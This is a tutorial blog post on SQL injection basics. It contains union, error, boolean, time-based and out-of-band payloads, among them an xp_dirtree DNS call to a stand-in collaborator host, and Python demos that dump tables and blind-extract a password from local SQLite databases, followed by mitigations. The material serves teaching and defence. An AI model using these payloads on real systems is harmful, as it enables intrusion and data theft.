Hi Guys,
I’m back with another exciting blog, and this time we’re diving into one of the most infamous and critical web vulnerabilities: SQL Injection. Whether you’re a developer, a cybersecurity enthusiast, or just someone curious about how attackers exploit web applications through SQLi, this blog is for you. This part focuses on the basics of SQLi; subsequent blogs will cover advanced SQL Injection.
SQL Injection is a vulnerability that lets an attacker interfere with the queries an application makes to its database. It occurs when user-controlled input (a username, a password, a URL parameter, any field whose value ends up in a query) is concatenated into the SQL text instead of being passed as a bound parameter, so the attacker’s input is executed as part of the query.
Through a SQL injection vulnerability an attacker can run queries of their own choosing: read sensitive data such as usernames and passwords, modify or delete data, and in the worst case (for example via database features that execute OS commands) achieve RCE (Remote Code Execution).
SQL Injection (aka SQLi) can be divided into several types, depending on the technique used and the attacker’s objective. Below is a simple diagram of the categories of SQLi (in-band, blind and out-of-band).
Let’s go through them one by one.
In In-Band SQL Injection the attacker uses the same communication channel both to launch the attack and to read the results: the data comes back in the HTTP response itself. From the attacker’s point of view this is the easiest type to detect and exploit. In-Band SQL Injection is further divided into two categories:
- Union Based
- Error Based
(i). Union Based SQL Injection🧑🤝🧑
It uses the UNION SQL operator to append the result of an attacker-chosen SELECT to the result of the application’s original query, so rows from other tables (for example users) come back in the same response as the product data. Two conditions must be met for the UNION to be accepted:
- The number of columns in both SELECTs must be the same
- The data types of corresponding columns must be compatible
Steps to exploit Union Based SQL Injection🧑💻
1. Determine the number of columns returned by the original query (ORDER BY n fails once n exceeds the column count)
2. Figure out which columns can hold string data (a string column is the useful place to land extracted text)
3. Use the UNION operator to pull sensitive data from other tables into the response
https://example.com/products?id=1' order by 1--
https://example.com/products?id=1' order by 2--
https://example.com/products?id=1' order by 3-- # Got error here, so the query returns 2 columns
https://example.com/products?id=1' UNION SELECT 'a', NULL-- # no error: column 1 accepts strings
https://example.com/products?id=1' UNION SELECT NULL, 'a'-- # no error: column 2 accepts strings
https://example.com/products?id=1' UNION SELECT email,pass from users--
Note on the comment marker: in MySQL the -- comment must be followed by whitespace, and a trailing space is easily lost when the payload travels in a URL, so in practice people write --+ or -- - (or use #) to be safe.
(ii). Error Based SQL Injection❌
In this type the database produces an error message that is returned to the attacker on the same channel. The message reveals the database product, the shape of the query and sometimes query results, and is used to craft a working payload. The simplest way to trigger an error is to break the query’s quoting with a single or double quote:
https://example.com/products?id=1'
The error text depends on the database used in the backend; the example below is from MySQL.
You have an error in your SQL syntax; check the manual that corresponds...
Now we can craft our SQL payload by analysing the SQL error.
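The following is an added example that is not part of the original post: it reproduces both in-band techniques above (the single-quote error probe, then the ORDER BY column count and the UNION extraction) against a small, constructed SQLite database. The schema, the table contents and the function names are assumptions made for the demo; the only thing that matters is that the application concatenates the id parameter into its query.

```python
import sqlite3

# Constructed sample database (not from the original post): the application
# only ever means to read from products; users is the table the attacker wants.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price INTEGER);
        INSERT INTO products VALUES (1, 'laptop', 999), (2, 'mouse', 25);
        CREATE TABLE users (username TEXT, email TEXT, pass TEXT);
        INSERT INTO users VALUES ('admin', 'admin@example.com', 's3cret');
    """)
    return conn

def vulnerable_lookup(conn, product_id):
    """The bug: the ?id= value is concatenated into the SQL text, so quotes,
    ORDER BY and UNION inside the value become part of the query."""
    sql = "SELECT name, price FROM products WHERE id = '" + product_id + "'"
    return conn.execute(sql).fetchall()

def error_on_quote(conn):
    """Error based detection: id=1' unbalances the quotes and the database
    error comes straight back on the same channel (None means no error)."""
    try:
        vulnerable_lookup(conn, "1'")
    except sqlite3.OperationalError as e:
        return str(e)
    return None

def count_columns(conn, max_cols=10):
    """Union step 1: ORDER BY n works until n exceeds the column count."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"1' ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return None

def union_dump(conn):
    """Union step 3: a second SELECT with the same column count is appended,
    so rows from users come back in the product response. (Step 2, the
    datatype probe with 'a'/NULL, always succeeds on SQLite because it is
    loosely typed; on strictly typed databases such as PostgreSQL or Oracle
    a type mismatch raises an error and tells you which column to use.)"""
    return vulnerable_lookup(conn, "1' UNION SELECT email, pass FROM users--")

if __name__ == "__main__":
    conn = make_db()
    print("error on quote:", error_on_quote(conn))
    print("columns:", count_columns(conn))
    print("dump:", union_dump(conn))
```

The same three probes are what you send as the id parameter of the real URL; the only difference is that the error text and the extra rows arrive inside an HTML page instead of a Python list, and the comment marker may need the --+ form mentioned above.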
In Blind SQL Injection the attacker does not see the result of the injected query in the response; the injection is inferred from changes in the application’s behaviour (a different page, or a delay). It is harder and slower to exploit than In-Band, but the impact is the same, and the process is readily automated with tools such as SQLMap. Blind SQLi commonly comes in two forms:
- Boolean Based SQL Injection
- Time Based SQL Injection
(i). Boolean Based SQL Injection✅❌
The attacker injects a condition that is either true or false and watches whether the application’s response changes accordingly (for example a product listed versus “no results”). If the response follows the truth value of the injected condition, Boolean Based SQLi is confirmed, and that true/false signal becomes a one-bit oracle for extracting data.
Steps to exploit Boolean Based SQL Injection🧑💻
1. Craft and send a condition that is always false (for example AND 1=2) and note the response
2. Craft and send a condition that is always true (for example AND 1=1) and note the response
3. Fire a series of TRUE/FALSE queries that each test one character of the secret, and reconstruct the sensitive data from the answers
https://example.com/products?name=laptop' AND 1=2--
https://example.com/products?name=laptop' AND SUBSTRING((SELECT password FROM users WHERE username = 'admin'), 1, 1) = 'a'--
The second payload asks “is the first character of the admin password an a?”; the attacker repeats it for every candidate character and every position until the whole value is known.
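The following is an added example that is not part of the original post. It implements the three boolean steps above against a constructed SQLite database, with a stand-in for the web page that only reports whether the product query returned rows. It goes beyond the single-character payload in the text by binary-searching the character code (what SQLMap does), so each character costs about seven requests instead of one per candidate. Table names, the users row and the function names are assumptions for the demo.

```python
import sqlite3

# Constructed sample data (not from the original post): the attacker is
# after the admin password but the page only ever shows product names.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT);
        INSERT INTO products VALUES ('laptop'), ('mouse');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'Pa55w0rd');
    """)
    return conn

def page_shows_results(conn, name):
    """Stand-in for the vulnerable page: the attacker cannot see query
    results, only whether the product list was empty or not."""
    sql = "SELECT name FROM products WHERE name = '" + name + "'"  # injectable
    try:
        return len(conn.execute(sql).fetchall()) > 0
    except sqlite3.OperationalError:
        return False  # a broken query looks exactly like "no results"

def confirm_boolean_sqli(conn):
    """Steps 1 and 2: a false condition must change the page, a true one must not."""
    return (page_shows_results(conn, "laptop' AND 1=1--")
            and not page_shows_results(conn, "laptop' AND 1=2--"))

def blind_int(conn, expr, lo, hi):
    """Binary-search the integer value of SQL expression `expr` (known to lie
    in [lo, hi]) using only the true/false oracle: about log2(hi - lo)
    requests per value instead of one request per candidate."""
    while lo < hi:
        mid = (lo + hi) // 2
        if page_shows_results(conn, f"laptop' AND ({expr}) > {mid}--"):
            lo = mid + 1
        else:
            hi = mid
    return lo

SECRET = "(SELECT password FROM users WHERE username = 'admin')"

def extract_password(conn):
    """Step 3: learn the length, then each character's code point.
    Comparing unicode()/ASCII() codes instead of quoted string literals
    avoids quoting trouble and sidesteps the case-insensitive collations
    MySQL uses by default (unicode() is SQLite's name for MySQL's ASCII())."""
    length = blind_int(conn, f"length({SECRET})", 0, 64)
    chars = []
    for pos in range(1, length + 1):
        code = blind_int(conn, f"unicode(substr({SECRET}, {pos}, 1))", 0, 127)
        chars.append(chr(code))
    return "".join(chars)

if __name__ == "__main__":
    conn = make_db()
    print("boolean SQLi confirmed:", confirm_boolean_sqli(conn))
    print("admin password:", extract_password(conn))
```

Against a real target, page_shows_results becomes an HTTP request plus a check for a marker string in the body (a product name, “no results”, a status code), and the rest of the code is unchanged; this is the loop SQLMap automates.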
(ii). Time Based SQL Injection⌚
The attacker injects a function that makes the database pause for a chosen number of seconds; if the response is delayed by that amount, the injection is confirmed. The delay can then be made conditional (for example IF(condition, SLEEP(10), 0) in MySQL) so that the same one-bit oracle as in the boolean case extracts data. Measure a baseline response time first and repeat each probe, because network jitter can both mimic and mask a delay. The functions differ per database; some examples:
MySQL: SELECT SLEEP(10)
Microsoft SQL Server: WAITFOR DELAY '0:0:10'
Oracle: dbms_pipe.receive_message(('a'),10)
PostgreSQL: SELECT pg_sleep(10)
In Out-of-Band SQL Injection the attacker retrieves data over a different channel, by making the database server issue a network request (typically DNS or HTTP) to a host the attacker controls, with the data embedded in the request. It is useful when neither the response content nor its timing can be used. On Microsoft SQL Server, for example, xp_dirtree forces a DNS lookup of the host in the UNC path it is given:
'; exec master..xp_dirtree '//BURP_COLLABORATOR_URL/mayank'--
Mitigations:
- Prepared Statements or Parameterized Queries (the primary defence: values are bound separately from the SQL text)
- Whitelisting of user’s input (Partial: needed for the parts of a query that cannot be parameterized, such as column names in ORDER BY)
- Stored Procedure (Partial: only if the procedure itself does not build dynamic SQL from its arguments)
References:
https://owasp.org/www-community/attacks/SQL_Injection
https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
https://portswigger.net/web-security/sql-injection
https://portswigger.net/web-security/sql-injection/cheat-sheet
https://www.acunetix.com/websitesecurity/sql-injection/
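The following is an added example that is not part of the original post, illustrating the first two mitigations listed above: the product lookup rewritten as a parameterized query, and an allowlist for a user-chosen ORDER BY column, which is the kind of input a parameter cannot protect. The schema, data and function names are assumptions for the demo.

```python
import sqlite3

# Constructed sample data (not from the original post).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price INTEGER);
        INSERT INTO products VALUES (1, 'laptop', 999), (2, 'mouse', 25);
        CREATE TABLE users (username TEXT, email TEXT, pass TEXT);
        INSERT INTO users VALUES ('admin', 'admin@example.com', 's3cret');
    """)
    return conn

def safe_lookup(conn, product_id):
    """Parameterized query: the SQL text is fixed and the value travels
    separately, so a quote or a UNION inside it is just data compared
    against the id column (the value arrives as a string, as from a URL)."""
    return conn.execute(
        "SELECT name, price FROM products WHERE id = ?", (product_id,)
    ).fetchall()

# Identifiers cannot be bound as parameters, so a user-chosen column name
# must be checked against an allowlist before it touches the query text.
SORTABLE_COLUMNS = {"name", "price"}

def is_sortable(column):
    return column in SORTABLE_COLUMNS

def safe_search(conn, name_fragment, sort_column):
    """Value bound as a parameter; identifier allowlisted and only then
    interpolated into the query."""
    if not is_sortable(sort_column):
        raise ValueError(f"unsupported sort column: {sort_column!r}")
    sql = ("SELECT name, price FROM products WHERE name LIKE ? "
           f"ORDER BY {sort_column}")
    return conn.execute(sql, ("%" + name_fragment + "%",)).fetchall()

if __name__ == "__main__":
    conn = make_db()
    print(safe_lookup(conn, "1"))
    print(safe_lookup(conn, "1' UNION SELECT email, pass FROM users--"))
    print(safe_search(conn, "lap", "price"))
```

The union payload that dumped the users table earlier now simply matches no product, because it never becomes SQL. Note that LIKE metacharacters (% and _) in name_fragment still act as wildcards; that is a separate search-semantics issue, not an injection, but escape them if exact matching matters.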
We will be learning advanced SQL injection techniques along with exploitation in upcoming parts. Thanks for reading😇
LinkedIn: https://www.linkedin.com/in/mayank-kumar-prajapati/